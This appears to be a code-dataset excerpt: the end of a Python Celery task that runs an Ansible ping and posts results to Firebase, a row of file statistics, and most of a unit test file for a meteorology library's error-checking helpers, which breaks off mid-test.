myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
# post results to firebase
myExternalData.post(job_id + '/returns', json.dumps(results))
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_ping(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
# get host from job
# NEEDS UPDATING FOR SPECIFICS
myHost = job['host']
# run the ansible job
results = ansible.runner.Runner(
module_name='ping',
module_args='',
pattern=myHost,
forks=10
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
other_result = myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
# post results to firebase
#returns = FirebaseApplication('https://deploynebula.firebaseio.com/external_data/', authentication)
myExternalData.post(job_id + '/returns', json.dumps(results))
#returns.patch(job_id + '/returns', json.dumps(results))
return results
| 29.916667 | 120 | 0.662334 | 728 | 6,462 | 5.774725 | 0.149725 | 0.029734 | 0.028544 | 0.045671 | 0.822312 | 0.821598 | 0.804472 | 0.804472 | 0.793768 | 0.793768 | 0 | 0.001979 | 0.218044 | 6,462 | 215 | 121 | 30.055814 | 0.830002 | 0.281492 | 0 | 0.701923 | 0 | 0 | 0.146347 | 0.018321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.048077 | 0.048077 | 0 | 0.125 | 0.009615 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c14d6a77ec834cce6720d35ebb68abfa457ee2f0 | 47,356 | py | Python | gewittergefahr/gg_utils/error_checking_test.py | dopplerchase/GewitterGefahr | 4415b08dd64f37eba5b1b9e8cc5aa9af24f96593 | ["MIT"] | 26 | 2018-10-04T01:07:35.000Z | 2022-01-29T08:49:32.000Z | gewittergefahr/gg_utils/error_checking_test.py | liuximarcus/GewitterGefahr | d819874d616f98a25187bfd3091073a2e6d5279e | ["MIT"] | 4 | 2017-12-25T02:01:08.000Z | 2018-12-19T01:54:21.000Z | gewittergefahr/gg_utils/error_checking_test.py | liuximarcus/GewitterGefahr | d819874d616f98a25187bfd3091073a2e6d5279e | ["MIT"] | 11 | 2017-12-10T23:05:29.000Z | 2022-01-29T08:49:33.000Z |
"""Unit tests for error_checking.py."""
import unittest
import os.path
import numpy
import pandas
from gewittergefahr.gg_utils import error_checking
COLUMNS_IN_DATAFRAME = ['foo', 'bar']
FAKE_COLUMNS_IN_DATAFRAME = ['foo', 'bar', 'moo']
DATAFRAME = pandas.DataFrame.from_dict(
{'foo': numpy.array([]), 'bar': numpy.array([])})
THIS_FILE_NAME = __file__
THIS_DIRECTORY_NAME = os.path.split(THIS_FILE_NAME)[0]
FAKE_FILE_NAME = THIS_FILE_NAME + '-_=+'
FAKE_DIRECTORY_NAME = THIS_DIRECTORY_NAME + '-_=+'
SINGLE_INTEGER = 1959
SINGLE_FLOAT = 1959.
SINGLE_BOOLEAN = True
SINGLE_COMPLEX_NUMBER = complex(1., 1.)
SINGLE_STRING = '1959'
STRING_LIST = [['do', 're'],
[['mi', 'fa']],
[[['so'], 'la']],
[['ti', 'do'], [[[' ']]]],
'']
REAL_NUMBER_LIST = [[211., 215],
[[214, 199.]],
[[[226.], 205.]],
[[221, 211], [[[32]]]],
0.]
REAL_NUMBER_TUPLE = ((211., 215),
((214, 199.),),
(((226.,), 205.),),
((221, 211), (((32,),),)),
0.)
REAL_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 0.]])
BOOLEAN_NUMPY_ARRAY = numpy.array([[False, True],
[True, False],
[True, False],
[True, False],
[False, False]])
FLOAT_NUMPY_ARRAY = numpy.array([[211., 215.],
[214., 199.],
[226., 205.],
[221., 211.],
[32., 0.]])
INTEGER_NUMPY_ARRAY = numpy.array([[211, 215],
[214, 199],
[226, 205],
[221, 211],
[32, 0]])
NAN_NUMPY_ARRAY = numpy.array([[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan]])
SINGLE_ZERO = 0.
SINGLE_NEGATIVE = -2.2
SINGLE_POSITIVE = 4.3
POSITIVE_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 1.]])
NON_NEGATIVE_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 0.]])
NEGATIVE_NUMPY_ARRAY = numpy.array([[-211., -215],
[-214, -199.],
[-226., -205.],
[-221, -211],
[-32, -1.]])
NON_POSITIVE_NUMPY_ARRAY = numpy.array([[-211., -215],
[-214, -199.],
[-226., -205.],
[-221, -211],
[-32, 0.]])
MIXED_SIGN_NUMPY_ARRAY = numpy.array([[-211., 215],
[-214, -199.],
[-226., 205.],
[221, 211],
[-32, 0.]])
POSITIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, 215],
[214, 199.],
[226., numpy.nan],
[221, 211],
[32, 1.]])
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, 215],
[214, 199.],
[226., numpy.nan],
[221, 211],
[32, 0.]])
NEGATIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, -215],
[-214, -199.],
[-226., numpy.nan],
[-221, -211],
[-32, -1.]])
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, -215],
[-214, -199.],
[-226., numpy.nan],
[-221, -211],
[-32, 0.]])
SINGLE_LATITUDE_DEG = 45.
SINGLE_LAT_INVALID_DEG = -500.
LAT_NUMPY_ARRAY_DEG = numpy.array([[42., -35.],
[35., -61.],
[33., 30.],
[-44., 39.]])
LAT_NUMPY_ARRAY_INVALID_DEG = numpy.array([[420., -350.],
[350., -610.],
[330., 300.],
[-440., 390.]])
LAT_NUMPY_ARRAY_SOME_INVALID_DEG = numpy.array([[42., -350.],
[35., -61.],
[330., 30.],
[-440., 39.]])
LAT_NUMPY_ARRAY_WITH_NANS_DEG = numpy.array([[42., -35.],
[numpy.nan, -61.],
[33., 30.],
[-44., numpy.nan]])
SINGLE_LONGITUDE_DEG = 45.
SINGLE_LNG_INVALID_DEG = 7000.
SINGLE_LNG_POSITIVE_IN_WEST_DEG = 270.
SINGLE_LNG_NEGATIVE_IN_WEST_DEG = -90.
LNG_NUMPY_ARRAY_DEG = numpy.array([[-73., 254.],
[101., -149.],
[84., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_INVALID_DEG = numpy.array([[-730., 2540.],
[1010., -1490.],
[840., 2630.],
[2430., 760.]])
LNG_NUMPY_ARRAY_SOME_INVALID_DEG = numpy.array([[-73., 2540.],
[101., -1490.],
[840., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG = numpy.array([[287., 254.],
[101., 211.],
[84., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG = numpy.array([[-73., -106.],
[101., -149.],
[84., -97.],
[-117., 76.]])
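# The constants above are shared fixtures: paired valid/invalid scalars,
# nested lists and tuples, and numpy arrays (positive/negative, NaN-laden,
# latitude/longitude) that the assertions below are exercised against.
# Application code uses the module the same way the tests do, e.g.
# (illustrative only, mirroring calls tested below):
#
#     error_checking.assert_is_numpy_array(x, num_dimensions=2)
#     error_checking.assert_is_greater_numpy_array(x, 0, allow_nan=True)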
class ErrorCheckingTests(unittest.TestCase):
"""Each method is a unit test for error_checking.py."""
def test_assert_columns_in_dataframe_list(self):
"""Checks assert_columns_in_dataframe when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMBER_LIST, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_tuple(self):
"""Checks assert_columns_in_dataframe when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMBER_TUPLE, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_numpy_array(self):
"""Checks assert_columns_in_dataframe when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMPY_ARRAY, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_missing_columns(self):
"""Checks assert_columns_in_dataframe.
In this case, input is pandas DataFrame but is missing one of the
desired columns.
"""
with self.assertRaises(KeyError):
error_checking.assert_columns_in_dataframe(
DATAFRAME, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_true(self):
"""Checks assert_columns_in_dataframe.
In this case, input is pandas DataFrame with all desired columns.
"""
error_checking.assert_columns_in_dataframe(DATAFRAME,
COLUMNS_IN_DATAFRAME)
def test_assert_is_array_scalar(self):
"""Checks assert_is_array when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_array(SINGLE_INTEGER)
def test_assert_is_array_list(self):
"""Checks assert_is_array when input is list."""
error_checking.assert_is_array(REAL_NUMBER_LIST)
def test_assert_is_array_tuple(self):
"""Checks assert_is_array when input is tuple."""
error_checking.assert_is_array(REAL_NUMBER_TUPLE)
def test_assert_is_array_numpy_array(self):
"""Checks assert_is_array when input is numpy array."""
error_checking.assert_is_array(REAL_NUMPY_ARRAY)
def test_assert_is_list_scalar(self):
"""Checks assert_is_list when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(SINGLE_INTEGER)
def test_assert_is_list_true(self):
"""Checks assert_is_list when input is list."""
error_checking.assert_is_list(REAL_NUMBER_LIST)
def test_assert_is_list_tuple(self):
"""Checks assert_is_list when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(REAL_NUMBER_TUPLE)
def test_assert_is_list_numpy_array(self):
"""Checks assert_is_list when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(REAL_NUMPY_ARRAY)
def test_assert_is_tuple_scalar(self):
"""Checks assert_is_tuple when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(SINGLE_INTEGER)
def test_assert_is_tuple_list(self):
"""Checks assert_is_tuple when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(REAL_NUMBER_LIST)
def test_assert_is_tuple_true(self):
"""Checks assert_is_tuple when input is tuple."""
error_checking.assert_is_tuple(REAL_NUMBER_TUPLE)
def test_assert_is_tuple_numpy_array(self):
"""Checks assert_is_tuple when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(REAL_NUMPY_ARRAY)
def test_assert_is_numpy_array_scalar(self):
"""Checks assert_is_numpy_array when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(SINGLE_INTEGER)
def test_assert_is_numpy_array_list(self):
"""Checks assert_is_numpy_array when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(REAL_NUMBER_LIST)
def test_assert_is_numpy_array_tuple(self):
"""Checks assert_is_numpy_array when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(REAL_NUMBER_TUPLE)
def test_assert_is_numpy_array_true(self):
"""Checks assert_is_numpy_array when input is numpy array."""
error_checking.assert_is_numpy_array(REAL_NUMPY_ARRAY)
def test_assert_is_numpy_array_num_dim_not_integer(self):
"""Checks assert_is_numpy_array when `num_dimensions` is not integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=float(REAL_NUMPY_ARRAY.ndim))
def test_assert_is_numpy_array_num_dim_negative(self):
"""Checks assert_is_numpy_array when `num_dimensions` is negative."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array(REAL_NUMPY_ARRAY,
num_dimensions=-1)
def test_assert_is_numpy_array_num_dim_unexpected(self):
"""Checks assert_is_numpy_array when `num_dimensions` is unexpected."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim + 1)
def test_assert_is_numpy_array_num_dim_correct(self):
"""Checks assert_is_numpy_array when `num_dimensions` is correct."""
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim)
def test_assert_is_numpy_array_exact_dim_scalar(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=REAL_NUMPY_ARRAY.shape[0])
def test_assert_is_numpy_array_exact_dim_list(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=REAL_NUMPY_ARRAY.shape)
def test_assert_is_numpy_array_exact_dim_not_integers(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is not int."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.float64))
def test_assert_is_numpy_array_exact_dim_negative(self):
"""Checks assert_is_numpy_array when `exact_dimensions` has negative."""
these_dimensions = -1 * numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64)
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_too_long(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is too long."""
these_dimensions = numpy.concatenate((
numpy.asarray(REAL_NUMPY_ARRAY.shape, dtype=numpy.int64),
numpy.array([1])))
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_unexpected(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is wrong."""
these_dimensions = 1 + numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64)
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_correct(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is correct."""
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64))
def test_assert_is_non_array_true(self):
"""Checks assert_is_non_array when input is scalar."""
error_checking.assert_is_non_array(SINGLE_INTEGER)
def test_assert_is_non_array_list(self):
"""Checks assert_is_non_array when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMBER_LIST)
def test_assert_is_non_array_tuple(self):
"""Checks assert_is_non_array when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMBER_TUPLE)
def test_assert_is_non_array_numpy_array(self):
"""Checks assert_is_non_array when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMPY_ARRAY)
def test_assert_is_string_number(self):
"""Checks assert_is_string when input is number."""
with self.assertRaises(TypeError):
error_checking.assert_is_string(SINGLE_INTEGER)
def test_assert_is_string_none(self):
"""Checks assert_is_string when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_string(None)
def test_assert_is_string_true(self):
"""Checks assert_is_string when input is string."""
error_checking.assert_is_string(SINGLE_STRING)
def test_assert_is_string_list_true(self):
"""Checks assert_is_string_list when input is string list."""
error_checking.assert_is_string_list(STRING_LIST)
def test_assert_file_exists_directory(self):
"""Checks assert_file_exists when input is directory."""
with self.assertRaises(ValueError):
error_checking.assert_file_exists(THIS_DIRECTORY_NAME)
def test_assert_file_exists_fake(self):
"""Checks assert_file_exists when input is fake file."""
with self.assertRaises(ValueError):
error_checking.assert_file_exists(FAKE_FILE_NAME)
def test_assert_file_exists_true(self):
"""Checks assert_file_exists when input is existent file."""
error_checking.assert_file_exists(THIS_FILE_NAME)
def test_assert_directory_exists_file(self):
"""Checks assert_directory_exists when input is file."""
with self.assertRaises(ValueError):
error_checking.assert_directory_exists(THIS_FILE_NAME)
def test_assert_directory_exists_fake(self):
"""Checks assert_directory_exists when input is fake directory."""
with self.assertRaises(ValueError):
error_checking.assert_directory_exists(FAKE_DIRECTORY_NAME)
def test_assert_directory_exists_true(self):
"""Checks assert_directory_exists when input is existent directory."""
error_checking.assert_directory_exists(THIS_DIRECTORY_NAME)
def test_assert_is_integer_too_many_inputs(self):
"""Checks assert_is_integer when input is array of integers."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(INTEGER_NUMPY_ARRAY)
def test_assert_is_integer_float(self):
"""Checks assert_is_integer when input is float."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_FLOAT)
def test_assert_is_integer_boolean(self):
"""Checks assert_is_integer when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_BOOLEAN)
def test_assert_is_integer_complex(self):
"""Checks assert_is_integer when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_COMPLEX_NUMBER)
def test_assert_is_integer_nan(self):
"""Checks assert_is_integer when input is NaN."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(numpy.nan)
def test_assert_is_integer_none(self):
"""Checks assert_is_integer when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(None)
def test_assert_is_integer_true(self):
"""Checks assert_is_integer when input is integer."""
error_checking.assert_is_integer(SINGLE_INTEGER)
def test_assert_is_integer_numpy_array_true(self):
"""Checks assert_is_integer_numpy_array when condition is true."""
error_checking.assert_is_integer_numpy_array(INTEGER_NUMPY_ARRAY)
def test_assert_is_boolean_too_many_inputs(self):
"""Checks assert_is_boolean when input is array of Booleans."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(BOOLEAN_NUMPY_ARRAY)
def test_assert_is_boolean_float(self):
"""Checks assert_is_boolean when input is float."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_FLOAT)
def test_assert_is_boolean_true(self):
"""Checks assert_is_boolean when input is Boolean."""
error_checking.assert_is_boolean(SINGLE_BOOLEAN)
def test_assert_is_boolean_complex(self):
"""Checks assert_is_boolean when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_COMPLEX_NUMBER)
def test_assert_is_boolean_nan(self):
"""Checks assert_is_boolean when input is NaN."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(numpy.nan)
def test_assert_is_boolean_none(self):
"""Checks assert_is_boolean when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(None)
def test_assert_is_boolean_integer(self):
"""Checks assert_is_boolean when input is integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_INTEGER)
def test_assert_is_boolean_numpy_array_true(self):
"""Checks assert_is_boolean_numpy_array when condition is true."""
error_checking.assert_is_boolean_numpy_array(BOOLEAN_NUMPY_ARRAY)
def test_assert_is_float_too_many_inputs(self):
"""Checks assert_is_float when input is array of floats."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(FLOAT_NUMPY_ARRAY)
def test_assert_is_float_true(self):
"""Checks assert_is_float when input is float."""
error_checking.assert_is_float(SINGLE_FLOAT)
def test_assert_is_float_boolean(self):
"""Checks assert_is_float when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_BOOLEAN)
def test_assert_is_float_complex(self):
"""Checks assert_is_float when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_COMPLEX_NUMBER)
def test_assert_is_float_nan(self):
"""Checks assert_is_float when input is NaN."""
error_checking.assert_is_float(numpy.nan)
def test_assert_is_float_none(self):
"""Checks assert_is_float when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(None)
def test_assert_is_float_integer(self):
"""Checks assert_is_float when input is integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_INTEGER)
def test_assert_is_float_numpy_array_true(self):
"""Checks assert_is_float_numpy_array when condition is true."""
error_checking.assert_is_float_numpy_array(FLOAT_NUMPY_ARRAY)
def test_assert_is_real_number_too_many_inputs(self):
"""Checks assert_is_real_number when input is array of real numbers."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(FLOAT_NUMPY_ARRAY)
def test_assert_is_real_number_float(self):
"""Checks assert_is_real_number when input is float."""
error_checking.assert_is_real_number(SINGLE_FLOAT)
def test_assert_is_real_number_boolean(self):
"""Checks assert_is_real_number when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(SINGLE_BOOLEAN)
def test_assert_is_real_number_complex(self):
"""Checks assert_is_real_number when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(SINGLE_COMPLEX_NUMBER)
def test_assert_is_real_number_nan(self):
"""Checks assert_is_real_number when input is NaN."""
error_checking.assert_is_real_number(numpy.nan)
def test_assert_is_real_number_none(self):
"""Checks assert_is_real_number when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(None)
def test_assert_is_real_number_integer(self):
"""Checks assert_is_real_number when input is integer."""
error_checking.assert_is_real_number(SINGLE_INTEGER)
def test_assert_is_real_numpy_array_true(self):
"""Checks assert_is_real_numpy_array when condition is true."""
error_checking.assert_is_real_numpy_array(FLOAT_NUMPY_ARRAY)
def test_assert_is_not_nan_too_many_inputs(self):
"""Checks assert_is_not_nan when input is array of floats."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(FLOAT_NUMPY_ARRAY)
def test_assert_is_not_nan_float(self):
"""Checks assert_is_not_nan when input is float."""
error_checking.assert_is_not_nan(SINGLE_FLOAT)
def test_assert_is_not_nan_boolean(self):
"""Checks assert_is_not_nan when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(SINGLE_BOOLEAN)
def test_assert_is_not_nan_complex(self):
"""Checks assert_is_not_nan when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(SINGLE_COMPLEX_NUMBER)
def test_assert_is_not_nan_nan(self):
"""Checks assert_is_not_nan when input is NaN."""
with self.assertRaises(ValueError):
error_checking.assert_is_not_nan(numpy.nan)
def test_assert_is_not_nan_none(self):
"""Checks assert_is_not_nan when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(None)
def test_assert_is_not_nan_integer(self):
"""Checks assert_is_not_nan when input is integer."""
error_checking.assert_is_not_nan(SINGLE_INTEGER)
def test_assert_is_numpy_array_without_nan_all_nan(self):
"""Checks assert_is_numpy_array_without_nan; input is all NaN's."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array_without_nan(NAN_NUMPY_ARRAY)
def test_assert_is_numpy_array_without_nan_mixed(self):
"""Checks assert_is_numpy_array_without_nan; input has some NaN's."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array_without_nan(
POSITIVE_NUMPY_ARRAY_WITH_NANS)
def test_assert_is_numpy_array_without_nan_true(self):
"""Checks assert_is_numpy_array_without_nan; input has no NaN's."""
error_checking.assert_is_numpy_array_without_nan(POSITIVE_NUMPY_ARRAY)
def test_assert_is_positive_negative(self):
"""Checks assert_is_greater with base_value = 0, input_variable < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(SINGLE_NEGATIVE, 0)
def test_assert_is_positive_zero(self):
"""Checks assert_is_greater with base_value = 0, input_variable = 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(SINGLE_ZERO, 0)
def test_assert_is_positive_true(self):
"""Checks assert_is_greater with base_value = 0, input_variable > 0."""
error_checking.assert_is_greater(SINGLE_POSITIVE, 0)
def test_assert_is_positive_nan_allowed(self):
"""Checks assert_is_greater; input_variable = NaN, allow_nan = True."""
error_checking.assert_is_greater(numpy.nan, 0, allow_nan=True)
def test_assert_is_positive_nan_banned(self):
"""Checks assert_is_greater; input_variable = NaN, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(numpy.nan, 0, allow_nan=False)
def test_assert_is_positive_numpy_array_true(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0."""
error_checking.assert_is_greater_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_greater_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_positive_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_positive_numpy_array_non_negative(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_negative(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_non_positive(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_mixed_sign(self):
"""assert_is_greater_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_false(self):
"""Checks assert_is_geq with base_value = 0, input_variable < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq(SINGLE_NEGATIVE, 0)
def test_assert_is_non_negative_zero(self):
"""Checks assert_is_geq with base_value = 0, input_variable = 0."""
error_checking.assert_is_geq(SINGLE_ZERO, 0)
def test_assert_is_non_negative_positive(self):
"""Checks assert_is_geq with base_value = 0, input_variable > 0."""
error_checking.assert_is_geq(SINGLE_POSITIVE, 0)
def test_assert_is_non_negative_numpy_array_positive(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0."""
error_checking.assert_is_geq_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_positive_with_nan_allowed(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_geq_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_negative_numpy_array_positive_with_nan_banned(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_negative_numpy_array_non_negative_with_nan_allowed(
self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs >= 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_geq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_negative_numpy_array_non_negative_with_nan_banned(
self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs >= 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_negative_numpy_array_negative(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_non_positive(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_numpy_array_mixed_sign(self):
"""assert_is_geq_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq_numpy_array(MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_negative_true(self):
"""Checks assert_is_less_than; base_value = 0, input_variable < 0."""
error_checking.assert_is_less_than(SINGLE_NEGATIVE, 0)
def test_assert_is_negative_zero(self):
"""Checks assert_is_less_than; base_value = 0, input_variable = 0."""
with self.assertRaises(ValueError):
